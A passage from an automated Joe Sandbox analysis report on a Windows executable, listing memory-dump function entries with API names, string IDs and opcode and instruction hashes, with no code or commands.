                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Menu$Delete$InfoItem
                                                            • String ID: P
                                                            • API String ID: 135850232-3110715001
                                                            • Opcode ID: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                            • Instruction ID: 35185e3a5d47d42e1c1a418dcfc142951784455a26f90002bfcedf51cccad25a
                                                            • Opcode Fuzzy Hash: 7a885196f2dcceb0a8221e88f5e4acf8149e86b4233e81131ef081c483961346
                                                            • Instruction Fuzzy Hash: E2415132A086C1C1EF51EF16E4443E9A761EB84BA0F9A8231DE6D476D1DF39E942C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ByteCharErrorFileLastMultiWideWrite
                                                            • String ID: U
                                                            • API String ID: 2456169464-4171548499
                                                            • Opcode ID: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                            • Instruction ID: 6d65759735e5708899c5f07f033b27ab48a04475a881acd6d262b8392d0cc5cc
                                                            • Opcode Fuzzy Hash: 94b35a9ebb8fe33294e0bdd0e775bf8e0988a6ef2a86fc1225fbcd9ba36526fe
                                                            • Instruction Fuzzy Hash: 9B41A522B1968182EB209F15F8443FAB7A1FB88B94F884131EE4E87788DF7CD445C754
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$Long
                                                            • String ID: SysTreeView32
                                                            • API String ID: 847901565-1698111956
                                                            • Opcode ID: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                            • Instruction ID: 605b78255219a97ee8a686230fbd9d52e60d0650254b3e2e8ea22c2a24937c87
                                                            • Opcode Fuzzy Hash: efcadc7bc094786019cbc8bf8bf3fbcf06e95b4321d3c984f5b6707381f7f713
                                                            • Instruction Fuzzy Hash: 31413E32A097C287EB70EB14A544B9AB7A1FB84764F584335DAA803B99DF3CD845CF50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateObjectStock
                                                            • String ID: SysMonthCal32
                                                            • API String ID: 2671490118-1439706946
                                                            • Opcode ID: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                            • Instruction ID: 70158fc2a9a2ab82cd51486fa80af8c984e4ecc2a45364a24582e0d6836278d5
                                                            • Opcode Fuzzy Hash: fd789cdfff50be9b4411109bcad662b9f9b7c83045e67513290be4d4cd92b5f4
                                                            • Instruction Fuzzy Hash: EA417C326086C28BE730DF25F444B9AF7A0FB88790F544229EB9903A99DF3CD4858F50
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window$CreateDestroyObjectStock
                                                            • String ID: msctls_updown32
                                                            • API String ID: 1752125012-2298589950
                                                            • Opcode ID: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                            • Instruction ID: 97df01eeeac47bbb4c7f99ba6dc30db1e7442b11342f85ce095dc0478ebd7792
                                                            • Opcode Fuzzy Hash: 74e3ad92c2baccfb6081841c4f4ce29bd6f6c1edab28d3e774f2eecd82cc7261
                                                            • Instruction Fuzzy Hash: DA318A72A18B8582EB20DB15F4407AAB7A1FBC5B95F988136DA8D43B98CF3CD445CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ErrorMode$InformationVolume
                                                            • String ID: %lu
                                                            • API String ID: 2507767853-685833217
                                                            • Opcode ID: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                            • Instruction ID: 4aa12365b771ecf4466e00a3d4ba8b3b6fb2d44ea38f16e9819b3e5e9434db51
                                                            • Opcode Fuzzy Hash: 672d97fc72a5ca8b35a6a563d603e89b9dfb37273f5f93e5ec3f9e9d545e6ea4
                                                            • Instruction Fuzzy Hash: 84316E72A08BC685DB10EB16F4801ADB7A5FB89BC0F994035EA8D43B65DF3CD555C710
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                            • String ID: msctls_trackbar32
                                                            • API String ID: 1025951953-1010561917
                                                            • Opcode ID: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                            • Instruction ID: 34d7fb63ebc584ac8ae1933fbf990387d1f67e27a64cda7c0cd780a9cec55920
                                                            • Opcode Fuzzy Hash: d23565779f05c86e88825c5223c790f228a79c76439431c452903b53a7f93148
                                                            • Instruction Fuzzy Hash: A3313872A096C187E760DF15F444B9AB7A1FB88B90F544239EB9803B54CF3CE845CB14
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Thread$CurrentProcessWindow$AttachChildClassEnumFocusInputMessageNameParentSendTimeoutWindows
                                                            • String ID: %s%d
                                                            • API String ID: 2330185562-1110647743
                                                            • Opcode ID: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                            • Instruction ID: de2435e75ac6346a9a8a6405b769b391fb783413863d826f90a9231d0dac77ab
                                                            • Opcode Fuzzy Hash: 4f7089e3504d96f16b1fb726daf46c0f00a77062a3aa85cf481a60796f0195a0
                                                            • Instruction Fuzzy Hash: AE21F965A09BC291EE14FB22F4542FAA365AB89BC0F984031DE9D07765DF2CE146C760
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Exception$DestructObject$Raise__vcrt_getptd_noexit
                                                            • String ID: csm
                                                            • API String ID: 2280078643-1018135373
                                                            • Opcode ID: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                            • Instruction ID: b0508476a91796bb144dea367979bb173ecba9b735a99e38c5bd2a224573c9fe
                                                            • Opcode Fuzzy Hash: f3b44f69e9663573439d22a4e4da11b073c1d9211702bf15dcc91806c3a7fe41
                                                            • Instruction Fuzzy Hash: 772121366086C187DA30EF52F4401AEB765FB85BA4F840225DE9D07B95CF3DE846CB10
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                            • String ID: 0
                                                            • API String ID: 33631002-4108050209
                                                            • Opcode ID: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                            • Instruction ID: 0f6dcae0adf334b55eeb55bf7c191cf38d4b18014feef20d0356870254d4b474
                                                            • Opcode Fuzzy Hash: 122fac756a3aebd614dbe24bd4d9d3fcd08661cb9d9b68eb4b308195107418d6
                                                            • Instruction Fuzzy Hash: AF217132618BC0C6D7209F21F48469AB7B4F794794F54422AEB9D03B94DF3CDA55CB10
                                                            APIs
                                                            • LoadLibraryA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF75F1A2DD1), ref: 00007FF75F1DAF37
                                                            • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF75F1A2DD1), ref: 00007FF75F1DAF4F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                            • API String ID: 2574300362-1816364905
                                                            • Opcode ID: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                            • Instruction ID: 264cc7e72d105e0bf9d547545715fb945e3a8fd7f7a96cc787711f1b9092dcde
                                                            • Opcode Fuzzy Hash: b553b98cf413c0522d0a8d0790f0dad2998fa959ac13788e6be9999dd8a5b612
                                                            • Instruction Fuzzy Hash: 80F01C61A15F8182EF08EB54F8843A8A3F4FB18B09FC80435CA1D42361EF7CE559C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                            • API String ID: 2574300362-4033151799
                                                            • Opcode ID: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                            • Instruction ID: 9a20924b98187670e12d1e124bda5ba9ff21648fd1d86b21a0c14c59d9804cbc
                                                            • Opcode Fuzzy Hash: 88aa4d55391e805054e25835240c34e867389002f23d272af78df165a122bac4
                                                            • Instruction Fuzzy Hash: 23E0ED61A15F4692EF14AB24E8643A8A3A0EB08B55F8C0435CA1D45350EF7CE595C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-1355242751
                                                            • Opcode ID: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                            • Instruction ID: 098eff7ac8ce5c2175ee1ec8a965e41f9ec5e29bfde8cd46f860f972034f953f
                                                            • Opcode Fuzzy Hash: f93d3ff0ce366ab95d7e6c8a1355595afc9dd02f208f5495b2fec8b10b31cda7
                                                            • Instruction Fuzzy Hash: 27E0ED61915B4682EF15BB54F8583E8A3E0FB58B48F880434CA5D46364EF7CD995C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 2574300362-3689287502
                                                            • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                            • Instruction ID: 57e828a0a26ad9f99d892950c5d6d8e888de18c39f41ca13ab6b1134e3b17c27
                                                            • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                            • Instruction Fuzzy Hash: 88E06D21915F4682EF14BB10F8483A8A3E1FB08B48F880431CA0D01350EF7CE599C360
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: AddressLibraryLoadProc
                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                            • API String ID: 2574300362-192647395
                                                            • Opcode ID: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                            • Instruction ID: d3f8c47dfa0666b018ddc23696fa2f5649988bab8ad1d3f97dc183e6a675d678
                                                            • Opcode Fuzzy Hash: 9c402017b67deeecdf71e3c2df55c45970ec8440a50b34eba4d95c6c8b29e614
                                                            • Instruction Fuzzy Hash: 79E01261915B42C2EF14AB14F8543A863E0FB18B48FC80435CA1D45360EFBCD5A9C320
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                            • Instruction ID: f3362dc42b9f5d3c081113fad432105edcb2184d8c0b9f81189f671b4df1a6a4
                                                            • Opcode Fuzzy Hash: 1cc42966959b643a311328828219b797476ac122a15b5d67e7ee0a83cfbaecc2
                                                            • Instruction Fuzzy Hash: 01D146B6B05B9686EB14DF2AD5902AC77B0FB88F88B554422DF8D47B58DF39D840C360
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: ClearVariant
                                                            • String ID:
                                                            • API String ID: 1473721057-0
                                                            • Opcode ID: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                            • Instruction ID: 4ab7bf8958a57763a5af5a89ac29f8e089ba3c1f6fb1047200eebc349b762227
                                                            • Opcode Fuzzy Hash: f7e9a6a1c2f8c019007800361108cca29dc074ba0bb03e63b32f82c3ddf48b44
                                                            • Instruction Fuzzy Hash: 65D16976B05B819AEB50EFA5E4801ECB3B1FB44788B840536DE0D57B99DF38D529C3A0
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                            • String ID:
                                                            • API String ID: 2000298826-0
                                                            • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                            • Instruction ID: 83e33de9c91a2fa4549b5d203532994ddf2f9f1877b4da23748888f6869444d2
                                                            • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                            • Instruction Fuzzy Hash: 81715F36A18B8186EB00EB25E4443EEA7A1FB84B88F844132EA4D47769DF7CD505C750
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F218000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742053250.00007FF75F22A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742069842.00007FF75F234000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff75f140000_EO3RT0fEfb.jbxd
                                                            Similarity
                                                            • API ID: Window$ClientMessageMoveRectScreenSend
                                                            • String ID:
                                                            • API String ID: 1249313431-0
                                                            • Opcode ID: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                            • Instruction ID: a697a2d48770a82cb54fda467e2be52bfa23d0ad1281a7a1ae99e853baf6fc18
                                                            • Opcode Fuzzy Hash: 9c4d75fca34e601744925f37f1e480e3e4c466c4cf94c3035283d246947070fa
                                                            • Instruction Fuzzy Hash: B5516172A0468186EF50EF25E4906FD7B61F784B98F955139DB1D53788DF39E841C320
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741949468.00007FF75F141000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF75F140000, based on PE: true
                                                            • Associated: 00000000.00000002.1741937517.00007FF75F140000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1742010501.00007FF75F1F5000.00000002.00000001.01000000.00000003.sdmpDownload File
